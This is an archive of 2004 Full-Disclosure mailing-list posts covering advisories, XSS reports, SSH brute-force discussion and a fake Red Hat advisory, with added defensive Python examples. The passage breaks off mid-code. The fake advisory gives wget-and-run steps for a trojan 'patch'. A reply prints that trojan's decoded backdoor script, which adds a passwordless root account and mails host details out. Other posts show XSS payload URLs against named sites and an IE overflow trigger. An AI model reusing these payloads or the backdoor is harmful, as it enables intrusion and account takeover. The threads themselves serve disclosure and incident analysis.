found in the processing of MSN SLP messages and the receiving of files.
These issues could lead Gaim to try to allocate more memory than
available, resulting in the crash of the application.

Impact
======

A remote attacker could crash Gaim and possibly execute arbitrary code
by exploiting the buffer overflow.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Gaim users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=net-im/gaim-1.0.2"
    # emerge ">=net-im/gaim-1.0.2"

References
==========

  [ 1 ] CAN-2004-0891
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0891
  [ 2 ] Gaim Security Issues
        http://gaim.sourceforge.net/security/

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-23.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0




 
[Full-Disclosure] Mozilla Thunderbird 0.8 / Firefox 0.9.3 temporary files (local)

From: Martin (broadcastptraced.net)
Date: Sun Oct 24 2004 - 16:09:05 CDT


Advisory attached.

Mozilla Thunderbird 0.8 / Firefox 0.9.3 temporary files (local)

Martin (broadcastptraced.net)

-------------------
Program Description
-------------------

"Thunderbird, our latest email program, includes intelligent spam
filters, spell-checking, security, customization, and newsgroups
support."

www.mozilla.org

-------------------
Problem Description
-------------------

When opening an attachment, or a link included in an email, Thunderbird
prompts the user with a dialog box, giving the choice to "Save to Disk"
or to "Open with" <default program>.

For example, we receive a PDF document attached, and on the Attachments
section, we choose "Open".

broadcast:/tmp$ ls -l *.pdf
-rw------- 1 broadcast broadcast 2002560 2004-10-24 18:38 wskbq43m.pdf

While the dialog box is still open, the file permissions are OK, and the
filename is random (except for the extension).
If we choose to save it to disk, and check /tmp again:

broadcast:/tmp$ ls -l *.pdf
ls: *.pdf: No such file or directory

Great, it's gone. Now let's choose to open it with the default viewer
(in my case, xpdf).
Again, while the dialog box is open, there are no apparent problems.

broadcast:/tmp$ ls -l *.pdf
-rw------- 1 broadcast broadcast 2002560 2004-10-24 18:42 hp1h30si.pd

But after choosing to open it with xpdf:

broadcast:/tmp$ ls -l *.pdf
-rw-r--r-- 1 broadcast broadcast 2002560 2004-10-24 18:42 programming.pdf

The file becomes world readable, until the user closes xpdf, or whatever
application he chose to read the attachment.
Also, the filename becomes predictable, but if the filename already
exists on /tmp, Thunderbird will choose a similar filename, and won't
work on the existing one.

This exact issue affects Mozilla Firefox 0.9.3. I haven't tested
older/newer versions, and all of this was tested under Debian Unstable.

A copy of this advisory and future updates on this issue may be found on:
http://broadcast.ptraced.net/advisories/008-firefox.thunderbird.txt

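An added example, not part of Martin's advisory: a Python check for the state described above. world_readable_files() lists the regular files in a directory that are readable by "other" (optionally only those you own, so the output is your own leaked attachments), and open_private_tempfile() shows the behaviour a launcher should have instead, a random name and mode 0600 from mkstemp regardless of umask. demo() reproduces both states inside a private directory; the file names are borrowed from the listing above as labels only.

```python
import os
import stat
import tempfile


def is_world_readable(mode):
    """True if the 'other' read bit is set in a stat mode."""
    return bool(mode & stat.S_IROTH)


def world_readable_files(directory, owner_uid=None):
    """Names of regular files in `directory` readable by everyone.

    With owner_uid set (e.g. os.getuid()) only your own files are reported,
    which is the check for attachments leaked by your own mail client.
    """
    hits = []
    for name in os.listdir(directory):
        path = os.path.join(directory, name)
        try:
            st = os.lstat(path)
        except FileNotFoundError:
            continue            # the viewer may delete it between listdir and stat
        if not stat.S_ISREG(st.st_mode):
            continue
        if owner_uid is not None and st.st_uid != owner_uid:
            continue
        if is_world_readable(st.st_mode):
            hits.append(name)
    return sorted(hits)


def open_private_tempfile(directory, suffix=""):
    """Create a temp file that stays 0600.

    mkstemp opens with O_CREAT|O_EXCL and an explicit mode of 0600, so the
    umask cannot widen it, and the random name cannot be predicted by another
    local user waiting to read (or pre-create) it.
    """
    return tempfile.mkstemp(suffix=suffix, dir=directory)


def demo():
    """Recreate the two states from the advisory and report what leaks."""
    with tempfile.TemporaryDirectory() as d:
        fd, private = open_private_tempfile(d, ".pdf")   # like wskbq43m.pdf while the dialog is open
        os.write(fd, b"%PDF-1.4\n")
        os.close(fd)
        leaked = os.path.join(d, "programming.pdf")      # like the renamed copy handed to xpdf
        with open(leaked, "wb") as f:
            f.write(b"%PDF-1.4\n")
        os.chmod(leaked, 0o644)                          # the mode Thunderbird 0.8 left behind
        return world_readable_files(d, os.getuid())


if __name__ == "__main__":
    print("leaked:", demo())                              # ['programming.pdf']
    print("in /tmp now:", world_readable_files("/tmp", os.getuid()))
```

The second print in the main block is the practical check: run it while an attachment is open in the external viewer and anything listed is what every other local user can read.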


 
RE: [Full-Disclosure] Help, possible rootkit

From: RandallM (randallmfidmail.com)
Date: Sun Oct 24 2004 - 16:41:21 CDT


Billy said:


Message: 1
From: "BillyBob" <billybobknobhotmail.com>
To: "Full Disclosure" <full-disclosurelists.netsys.com>
Date: Sat, 23 Oct 2004 13:05:29 -0300
Subject: [Full-Disclosure] Help, possible rootkit

I have noticed that my XP system is behaving like I have a rootkit.


Billy,
1. Go directly to safe-mode
2. go to regedit and check start up processes in computer and user and
research each unfamiliar
3. run hijack this program
4. run spybot
5. upon start up use tcp-view and process viewer from sysinternals.com to see
connections

One person made mention of this once when I had this problem on a sales
laptop:

"If you have scripting enabled, it is possible that one of them is doing
this in the background. Scripts can remain active after you have left
the page that started them.

Some PC programmers tend to use "busy waits" instead of calling a
sleep() or hibernate() function. This tends to kill performance on
multiuser systems."

Optical mice also don't work well with certain colored pads and such. Make
sure you try a different surface.

Also of course clean the area very well. A piece of hair can cause problems.

Just some quick thoughts
 

thank you
Randall M
 



 
[Full-Disclosure] XSS vulnerabilities in several german communities + aol search

From: Habonator _ (habonatorgmail.com)
Date: Sun Oct 24 2004 - 16:59:26 CDT


I've discovered XSS bugs in several big german communities.
All these communities use cookie based authentication so it's
possible to inject script code to steal users' cookies.

All vendors have been informed.

1. giga.de - NBC GIGA Community
*************
Affected:
Whole Comment-System

Example:
http://www.giga.de/news/comments/index.php?id=XXXXXX&newstypid=XXXXX"><script>alert("foo");</script><form%20"

2. pcwelt.de - Community of the PC-WELT - Magazine
*************
Affected:
Search

Example:
http://www.pcwelt.de/index.cfm?pid=XXX&stichwort=<script>alert("foo");</script>

3. autoscout24.de - online car market
*************
Affected:
All offering sites

Example:
http://www.autoscout24.de/home/index/detail.asp?ts=XXXXXXX"><script>alert("foo");</script><form%20"&source=topcar&id=XXXXXXXXXXX

Last but not least, not a community but a funny one:
http://suche.aol.de/suche/search.jsp?q=%3Cscript%3Ealert%28%27foo%27%29%3B%3C%2Fscript%3E&wo=

**************************
Discovered by "Habonator"
At home at http://www.hackerboard.de
Hi to tripbit.
**************************



 
[Full-Disclosure] Re: Any update on SSH brute force attempts?

From: Jay Libove (libovefelines.org)
Date: Sun Oct 24 2004 - 17:11:04 CDT


Hi Miriam -

I have not attempted any type of automated blocking, as the attack profile
appears to not present a threat to systems with reasonably good passwords.
(I'm being a little lax about this, I realize).

What I have seen, in terms of the sources, intensity, and frequency of the
attempts, matches what you reported - where the attempts come from varies
every time, the number of different accounts that each attempt goes after
varies greatly, and while I may see attempts from two different source IP
addresses on one night, it may then be several days before I see any other
attempts at all.

I therefore agree that it does not appear to be any kind of widespread
worm/virus, but instead manually launched. I guess that the targeting
(what IP address[es] the attempts are made against) is random.

Thanks
-Jay

> Message: 17
> Date: Sun, 24 Oct 2004 09:43:17 +0800
> From: Miriam Chan <miriamchangeocities.com>
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] Re: Any update on SSH brute force attempts?
>
> Jay Libove wrote:
> > Recently, a couple of times a week, I see repeats of this which now have
> > as many as fifty different accounts being attacked. (Almost none of which
> > exist on my server, and none of which will have common passwords
> > thankyouverymuch).
>
> By the way, I started to suspect that the attacks were intentional (not just
> some games by some script kiddies.) I had some servers accepting SSH
> connections from anywhere (this is for easy access, and I know it is not
> a very good idea.)
>
> Before I set up a Portsentry-like mechanism to block the bad hosts, I got at
> least 5-6 attempts per day. Afterward, I got nearly none (just some 1-2
> attempts a day.) The change looks simply too much for me. If I got some
> number of attacks a day, I would expect the same number of attacks the next
> day if the attacks were automatically done by some virus/worms. I wished that
> it was done by some virus, because (I think) a virus is not more malicious
> than a planned cracking behaviour.
>
> Does anyone have the same observations as me? It would be great if you saw
> it and shared your ideas.
>
> Miriam.

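An added example, not from Jay's or Miriam's posts: counting failed sshd logins per source address from the auth log and flagging the sources that tried many different accounts, which is the pattern both describe (dozens of mostly non-existent accounts from one address, then nothing for days). The log lines below are constructed in the style of OpenSSH of the period, which wrote "illegal user" for unknown accounts (later versions say "invalid user"; both are matched). The thresholds are assumptions to tune, and hosts_deny_lines() produces the tcp_wrappers entries a Portsentry-like blocker would append.

```python
import re
from collections import defaultdict

# OpenSSH failure lines; unknown accounts are prefixed "illegal user" (old) or
# "invalid user" (newer).  Accepted logins and other sshd chatter do not match.
FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:(?:illegal|invalid) user )?(\S+) from (\S+) port \d+"
)

# Constructed sample in syslog/OpenSSH 3.x style, not a real auth.log.
SAMPLE_AUTH_LOG = """\
Oct 24 03:12:01 gw sshd[8121]: Failed password for illegal user test from 10.0.0.5 port 33122 ssh2
Oct 24 03:12:04 gw sshd[8123]: Failed password for illegal user guest from 10.0.0.5 port 33125 ssh2
Oct 24 03:12:07 gw sshd[8125]: Failed password for illegal user admin from 10.0.0.5 port 33129 ssh2
Oct 24 03:12:10 gw sshd[8127]: Failed password for root from 10.0.0.5 port 33133 ssh2
Oct 24 03:12:13 gw sshd[8129]: Failed password for root from 10.0.0.5 port 33137 ssh2
Oct 24 03:12:16 gw sshd[8131]: Failed password for illegal user oracle from 10.0.0.5 port 33140 ssh2
Oct 24 09:40:51 gw sshd[9012]: Failed password for jay from 192.168.7.20 port 51002 ssh2
Oct 24 09:41:20 gw sshd[9014]: Accepted password for jay from 192.168.7.20 port 51003 ssh2
"""


def failed_logins(text):
    """Map source IP -> list of usernames tried, one entry per failure, in order."""
    per_ip = defaultdict(list)
    for line in text.splitlines():
        m = FAILED.search(line)
        if m:
            per_ip[m.group(2)].append(m.group(1))
    return per_ip


def brute_force_sources(per_ip, min_failures=5, min_accounts=3):
    """Sources over either threshold as (ip, failures, distinct accounts), sorted.

    Either condition flags a scan: a long run against one account, or a short
    run that walks a username list.  A legitimate user mistyping a password
    once or twice from one address trips neither.
    """
    out = []
    for ip, users in per_ip.items():
        if len(users) >= min_failures or len(set(users)) >= min_accounts:
            out.append((ip, len(users), len(set(users))))
    return sorted(out)


def hosts_deny_lines(sources):
    """tcp_wrappers /etc/hosts.deny entries for the flagged sources."""
    return ["sshd: %s" % ip for ip, _, _ in sources]


if __name__ == "__main__":
    per_ip = failed_logins(SAMPLE_AUTH_LOG)
    for ip, users in per_ip.items():
        print(ip, len(users), "failures, accounts:", sorted(set(users)))
    flagged = brute_force_sources(per_ip)
    print(flagged)                        # [('10.0.0.5', 6, 5)]
    print("\n".join(hosts_deny_lines(flagged)))
```

On a real host feed it `failed_logins(open("/var/log/auth.log").read())` (or /var/log/secure); the distinct-account count is the number that distinguishes the dictionary scans in this thread from a colleague who forgot a password.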


 
[Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Hugo van der Kooij (hvdkooijvanderkooij.org)
Date: Sun Oct 24 2004 - 17:59:18 CDT


-----BEGIN PGP SIGNED MESSAGE-----

Be advised.

The message below is currently going around on the internet. Being unsigned
was the first obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasons to suspect it.

Message was sent from 'University of Texas at Arlington'.

I am sure none of you should be fooled by such a message but others might
be.

And while it lasts you may want to get the file for your own educational
purposes.

Hugo.
- ---------- Forwarded message ----------
Date: Sun, 24 Oct 2004 17:22:20 -0500
From: RedHat Security Team <securityredhat.com>
To: *****************
Subject: RedHat: Buffer Overflow in "ls" and "mkdir"

[logo_rh_home.png]

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the
fileutils-1.0.6 patch. This is a critical-critical update that you must
make by following these steps:

 * First download the patch from the Security RedHat mirror: wget
    www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
 * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
 * cd fileutils-1.0.6.patch
 * make
 * ./inst

Again, please apply this patch as soon as possible or you risk your
system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright (C) 2004 Red Hat, Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7
OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo
H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL
fcdKycT5D9E=
=/nEk
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Sun Oct 24 2004 - 18:24:47 CDT


Elia Florio wrote:

> > I'm not sure that qmail-inject isn't a red herring? The actual
> > download looks like 'wget' was used.
> Good suggestion, my friend :)
>
> It was used WGET to retrieve the http://xpire.info/cli.gz connectback shell.

More specifically, from the strings in the binary it looks awfully like
sd's bindtty -- try Googling for "bindtty.c"...

The possible bad news is that bindtty is used in the suckit rootkit, so
your remote-only access may cause major (if not insurmountable)
problems to doing a half-useful diagnosis...

<<big snip>>
> The hacker page used to accomplish the injection are based on this
> test-page, taken directly on the hacker-site :-)
>
> http://xpire.info/s/2
> http://xpire.info/s/
>
> I notice that this site is full of trojan/backdoor/shell/worm/exploit and
> other malware....why is it still open?

You'd be surprised how few folk actually complain about a lot of these
sites. Compound that with the rate of incompetence at many small (and
even many not-so-small) ISPs, where the very thin margins mean they
don't have time (and seldom good enough staff anyway) to analyse such
complaints, and where the emphasis is often more on making sure they
get their $10, $20, $40, etc this month from that customer, and many
such sites stay up way too long. The way to break such sites is for
some "authority" to contact them (a CERT, law enforcement, etc) or
"enough" polite, professional, clearly technically competent but not
overly technical complaints explaining what the site is being used for
and why it should be shut down. Of course, often the "base" sites are
themselves simply just ill-maintained systems that have, themselves,
been hacked and if all the ISP is up to doing is closing the apparently
rogue site/account, or simply removing the "offending content" the site
(and others similarly hosted on the still badly maintained servers)
remains open to further, similar abuse.

Regards,

Nick FitzGerald



 
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Harry Hoffman (hhoffmanip-solutions.net)
Date: Sun Oct 24 2004 - 18:51:09 CDT


haha, that's pretty funny. If they were going to do something like that
it should have at least been in a rpm format.

I'm hoping that this doesn't need to be said but if neither
"yum check-update || up2date -l" reports anything then chances are there
are no "Official Fedora Updates"

--Harry

Hugo van der Kooij wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
>
> Be advised.
>
> The message below is currently going around on the internet. Being unsigned
> was the first obvious issue. Not pointing to RPM updates, being in a
> different format and such were among the other reasons to suspect it.
>
> Message was sent from 'University of Texas at Arlington'.
>
> I am sure none of you should be fooled by such a message but others might
> be.
>
> And while it lasts you may want to get the file for your own educational
> purposes.
>
> Hugo.



 
Re: [Full-Disclosure] Crypto and Primes

From: Janusz A. Urbanowicz (alexbofh.net.pl)
Date: Sun Oct 24 2004 - 19:46:47 CDT


On Fri, Oct 22, 2004 at 02:31:28PM -0700, Daniel Sichel wrote:
> Depending on how rigourous you are being, the large in large numbers is
> a relative term. I know from talking to someone who has worked in for
> real government crypto that there is enough storage space to create a
> lookup db of a good chunk (if not all) of the PGP crypto keys in use for
> common key sizes (512 and 1024). I doubt SSL is less vulnerable. I guess
> there's force, brute force, and brute force with taxpayer dollars.

This is disinfo, or, misunderstanding. Some sources DO report existence of
such lookup tables used for DES, and this could be extended to other
ciphers, like meet-in-the-middle lookup tables for 3DES. But as others
pointed out, for primes, this would be... unwieldy.

Alex
--
0x46399138



 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Janusz A. Urbanowicz (alexbofh.net.pl)
Date: Sun Oct 24 2004 - 19:41:15 CDT


On Fri, Oct 22, 2004 at 04:30:36PM -0600, twebsterdaksoft.com wrote:
> openssl encryption and decryption,
>
> encrypt
> openssl enc <cipher> -e -in filename.txt -out filename.enc
> openssl enc -aes-256-cfb -e -in filename.txt -out filename.enc
>
>
> decrypt
> openssl enc <cipher> -d -in filename.enc -out filename.txt
> openssl enc -aes-256-cfb -d -in filename.enc -out filename.txt

it is still better to use gpg in -c mode as it does proper key hashing from
the passphrase

a
--
0x46399138

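An added example, not from the thread, showing why the gpg -c recommendation holds. `openssl enc -k` of that era derived key and IV with EVP_BytesToKey: one pass of MD5 per 16-byte output block, chained as D_i = MD5(D_{i-1} || password || salt) with the 8-byte salt stored after the "Salted__" header, and no iteration count, so a dictionary guess against aes-256-cfb costs three MD5 calls. gpg -c uses OpenPGP's iterated and salted string-to-key instead, which hashes a configurable amount of passphrase-plus-salt per guess. The Python below implements EVP_BytesToKey, stands in PBKDF2 from hashlib for an iterated KDF (gpg's S2K is not in the standard library and is not the same construction), and runs one small dictionary attack against both. The salt, word list and iteration count are constructed for the demonstration.

```python
import hashlib
import hmac
import time


def evp_bytes_to_key(password, salt, key_len, iv_len):
    """OpenSSL EVP_BytesToKey with MD5 and count=1, as `openssl enc -k` used it.

    Produces key_len + iv_len bytes as D_1 || D_2 || ... where
    D_i = MD5(D_{i-1} || password || salt).  A 32-byte AES-256 key plus a
    16-byte IV is exactly three MD5 calls, whatever the password.
    """
    out, prev = b"", b""
    while len(out) < key_len + iv_len:
        prev = hashlib.md5(prev + password + salt).digest()
        out += prev
    return out[:key_len], out[key_len:key_len + iv_len]


def pbkdf2_key(password, salt, key_len, iterations):
    """Iterated, salted derivation: every guess costs `iterations` HMAC rounds.
    Stand-in for the cost model of gpg's iterated+salted S2K (not the same algorithm)."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, iterations, key_len)


def dictionary_attack(target_key, salt, wordlist, derive):
    """Try each candidate through `derive(password, salt)`.
    Returns (password, guesses) on a hit or (None, guesses) after exhausting the list."""
    for n, cand in enumerate(wordlist, 1):
        if hmac.compare_digest(derive(cand, salt), target_key):
            return cand, n
    return None, len(wordlist)


# Constructed values for the demonstration only.
SALT = b"\x01\x02\x03\x04\x05\x06\x07\x08"            # openssl stores 8 bytes after "Salted__"
WORDLIST = [b"password", b"letmein", b"qwerty", b"s3cret", b"hunter2"]
ITERATIONS = 100_000


def evp_key(password, salt):
    """Key half of EVP_BytesToKey for aes-256 (32-byte key, 16-byte IV)."""
    return evp_bytes_to_key(password, salt, 32, 16)[0]


def iterated_key(password, salt):
    """32-byte key from the iterated KDF with the constructed iteration count."""
    return pbkdf2_key(password, salt, 32, ITERATIONS)


if __name__ == "__main__":
    for name, derive in (("EVP_BytesToKey/MD5", evp_key), ("PBKDF2 x%d" % ITERATIONS, iterated_key)):
        target = derive(b"s3cret", SALT)
        t0 = time.perf_counter()
        hit, guesses = dictionary_attack(target, SALT, WORDLIST, derive)
        dt = time.perf_counter() - t0
        print("%-22s found %r after %d guesses, %.1f ms per guess" % (name, hit, guesses, 1000 * dt / guesses))
```

Both runs recover the password at the same guess number; the only thing the KDF changes is the cost per guess, which is the whole point of "proper key hashing". Note that EVP_BytesToKey with count=1 also reuses the same unsalted-per-file structure for the IV, so two files encrypted with the same password and salt get the same key and IV.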


 
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Andrew Farmer (andfarmteknovis.com)
Date: Sun Oct 24 2004 - 20:18:41 CDT


Hugo van der Kooij wrote:
> Be advised.
> The message below is currently going around on the internet. Being unsigned
> was the first obvious issue. Not pointing to RPM updates, being in a
> different format and such were among the other reasons to suspect it.
> Message was sent from 'University of Texas at Arlington'.
> I am sure none of you should be fooled by such a message but others
> might
> be.
> And while it lasts you may want to get the file for your own
> educational
> purposes.
<snip>

I did a quickie analysis of the program (which is basically just
distributed as source!).

Strings are encrypted with arcfour; however, as the keys are included
too, decrypting them is no problem.

pswd[] is an initialization vector for arcfour.

shll[] decodes to: /bin/sh
inlo[] decodes to: -c
xecc[] decodes to: exec '%s' "$"
lsto[] decodes to a null string.
chk1[] decodes to: KTZE4lIVf7i4BR

opts[], text[], and chk2[] are encrypted with some (apparently
constant) data retrieved by statting /bin/sh.

To cut to the chase, the whole thing ends up clearing the screen and
running the following shell script:

> #!/bin/sh
> cd /tmp/
> clear
> if [ `id -u` != "0" ]
> then
> echo "This patch must be applied as \"root\", and you are:
> \"`whoami`\""
> exit
> fi
> echo "Identifying the system. This may take up to 2 minutes. Please
> wait ..."
> sleep 3
> if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then
> echo "Inca un root frate belea: " >> /tmp/mama
> adduser -g 0 -u 0 -o bash >> /tmp/mama
> passwd -d bash >> /tmp/mama
> ifconfig >> /tmp/mama
> uname -a >> /tmp/mama
> uptime >> /tmp/mama
> sshd >> /tmp/mama
> echo "user bash stii tu" >> /tmp/mama
> cat /tmp/mama | mail -s "Inca o roata" rootaddlebrain.com >>
> /dev/null
> rm -rf /tmp/mama
> mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
> fi
>
> bla()
> {
> sleep 2
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 2
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 3
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 4
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 1
> echo "#"
> sleep 1
> }
>
> echo "System looks OK. Proceeding to next step."
> sleep 1
> echo
> echo -n "Patching \"ls\": "
> bla
> echo -n "Patching \"mkdir\": "
> bla
> echo
> echo "System updated and secured successfuly. You may erase these
> files."
> sleep 1

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFBfFRxPa6RRaKl0ScRAunHAKC0vRGXCYxviDPA4OxIL9f1Kq1kiQCcDZpK
InTx2SYpJOGhQxE17Nf4WZg=
=jaVu
-----END PGP SIGNATURE-----

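An added example, not part of Andrew's analysis: the checks a responder would run on a host that has executed the script above, as Python over constructed /etc/passwd and /etc/shadow excerpts (not taken from any real system). extra_uid0_accounts() lists accounts other than root with uid 0 (what `adduser -g 0 -u 0 -o bash` creates), passwordless_accounts() lists accounts whose shadow hash field is empty (what `passwd -d bash` leaves, so anyone can log in as them with no password), and scan_tree() walks a directory for names made only of dots and whitespace, the ". " marker directories the script nests under /tmp to mark a host as already done.

```python
import os
import re
import tempfile

# Constructed excerpts showing the state the fake "patch" leaves behind.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
bash:x:0:0::/home/bash:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$1$saltsalt$abcdefghijklmnopqrstuv:12700:0:99999:7:::
bin:*:12700:0:99999:7:::
apache:!!:12700:0:99999:7:::
bash::12700:0:99999:7:::
"""


def extra_uid0_accounts(passwd_text):
    """Account names with uid 0 other than 'root'; exactly one uid-0 account is expected."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


def passwordless_accounts(shadow_text):
    """Accounts whose shadow hash field is empty (login with no password at all).
    '*' and '!!' are locked, not empty, and are not reported."""
    found = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] == "":
            found.append(fields[0])
    return found


# Names consisting only of dots and whitespace, e.g. ". " from  mkdir -p /tmp/." "/." "
ODD_NAME = re.compile(r"^[\s.]+$")


def odd_names(names):
    """Entries from a directory listing whose name is nothing but dots and whitespace."""
    return [n for n in names if n not in (".", "..") and ODD_NAME.match(n)]


def scan_tree(root):
    """Full paths of every oddly named file or directory under root."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for n in odd_names(dirnames + filenames):
            hits.append(os.path.join(dirpath, n))
    return hits


if __name__ == "__main__":
    print("extra uid 0:", extra_uid0_accounts(SAMPLE_PASSWD))      # ['bash']
    print("no password:", passwordless_accounts(SAMPLE_SHADOW))    # ['bash']
    # Rebuild the script's nested ". " marker inside a scratch directory and find it.
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, *([". "] * 9)))
        print("markers:", len(scan_tree(tmp)), "oddly named entries under", tmp)   # 9
```

On a live host read the real files (`extra_uid0_accounts(open("/etc/passwd").read())`, shadow as root) and point scan_tree at /tmp; remember that on a box where this script has run, the uid-0 "bash" account is the persistence, and the mail to the address in the script has already told the sender the host is theirs.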


 
Re: [Full-Disclosure] python does mangleme (with IE bugs!)

From: Berend-Jan Wever (skylinededup.tudelft.nl)
Date: Sun Oct 24 2004 - 20:55:10 CDT


Hi all, here's my analysis of these bugs:

2445.html does nothing on my win2ksp4en/ie6.0sp1. (IE does crash when you load it because the META refresh tag leads to 2446.html.)
2446.html contains an exploitable BoF in the IFRAME tag using the SRC and NAME property. To trigger the BoF you only need this tag in a HTML file:
<IFRAME SRC=AAAAAAAAAAAA.... NAME="BBBBBBBBBBB....">

Exactly why or how it happens, I do not know yet. I do know you can control EAX, after which this gets executed:
7178EC02 8B08 MOV ECX, DWORD PTR [EAX]
7178EC04 68 847B7071 PUSH SHDOCVW.71707B84
7178EC09 50 PUSH EAX
7178EC0A FF11 CALL NEAR DWORD PTR [ECX]
Control over EAX leads to control over ECX, which you can use to control EIP: Remote Command Execution.

They'd better patch this one quickly, a reliable working exploit shouldn't take more than a day to code.

Cheers,
SkyLined

----- Original Message -----
From: "ned" <ndfelinemenace.org>
To: <bugtraqsecurityfocus.com>
Cc: <full-disclosurelists.netsys.com>; <lcamtufghettot.org>
Sent: Sunday, October 24, 2004 06:36
Subject: [Full-Disclosure] python does mangleme (with IE bugs!)

> i've made a port of mangleme:
> http://felinemenace.org/~nd/htmler.py
> with a few extra quirks (such as file extensions/url types)
>
> it finds IE bugs after roughly 2.5 -> 3 hours and they are at:
> http://felinemenace.org/~nd/crash_ie/
>
> They are not the null pointer dereference that Michal found (which
> curiously seems to not own my 6.0.2800.1106.xpsp1?) but some other
> probably non-exploitable problems!
>
> htmler.py doesn't use CGI like mangleme but generates webpages in the
> directory 'html1' numbered 0.html to n.html. 0.html then uses a refresh to
> load 1.html and so on with little user interaction required!
>
> anyway, if you find bugs with it, don't sell to anyone/notify vendors!
> - nd
>
> --
> http://felinemenace.org/~nd - "eat a duck"
>
>



 
Re: [Full-Disclosure] Windows Time Synchronization - Best Practices

From: Gary E. Miller (gemrellim.com)
Date: Sun Oct 24 2004 - 20:48:07 CDT



Yo Michael!

On Fri, 22 Oct 2004, Micheal Espinola Jr wrote:

> You can certainly have multiple time servers specified with Windows
> Time Service (SNTP). RTM. It has the ability to failover through a
> list.

Yes you can have multiple time servers, but only one active at a time.
With NTP your client polls a number of diverse servers. Routes can
flap, servers can go wacko, but your time stays solid.

> If you need the full features of NTP, by all means use a third party
> daemon. However, in keeping my routers, RADIUS, and Kerberos sync'd
> properly - I have yet to require anything that SNTP is unable to
> provide.

So I agree it is not always required, but when those devices support
native SNTP why not use the best?

A lot of services are dependent on linear time. NTP will usually slew
the local host time to the correct value, SNTP will usually jump
time to the correct value. This can cause things like cron daemons
to miss scheduled events. I have seen this cause problems.

BTW, A Cisco router makes a dandy low-latency local NTP time server.

> I've never heard of time.microsoft.com, and have never seen any
> indication in any documentation to ever suggest using it. MS's docs
> have always suggested US naval observatory sites (since the
> documentation is US-based).

Just read all the w32time KB articles and the only time server
mentioned with a FQDN is time.microsoft.com.

Even the usno NTP has gone bonkers. Not dead, bonkers. So failover
never occurred. Folks that synced to it and other servers with NTP
had no issues. Those that used it solely were SOL.

> I missed something. Why would the requester time sync to Seattle, WA
> USA if they are in Brazil? That certainly goes against NTP RFC's,
> regardless of any suggestions of the use of time.microsoft.com.

Cause that is the only time server mentioned by FQDN in the M$ KB.

> I have used 3rd party daemons as well as the built-in SNTP. Both work
> equally well. The built-in tools can work just fine if you understand
> the components and know how to properly use them. There is more
> functionality available than what is simply represented by NET TIME.
> Again, its a matter of RTM.

Well, I RTM the SNTP RFC and it says only to use SNTP on local nets at
the end nodes. YMMV.

RGDS
GARY
- ---------------------------------------------------------------------------
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
        gemrellim.com Tel:+1(541)382-8588 Fax: +1(541)382-8676
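The slew-versus-step point in the post above, as an added example that is not part of the original thread: a small Python model of a naive once-per-second scheduler driven by a clock that is corrected either by a jump or by a slew. The clock error, job times, lateness tolerance and slew rate are all constructed; the slew rate is far larger than ntpd's 500 ppm cap purely to keep the run short.

```python
"""Added example (not from the original posts): a stepped clock versus a
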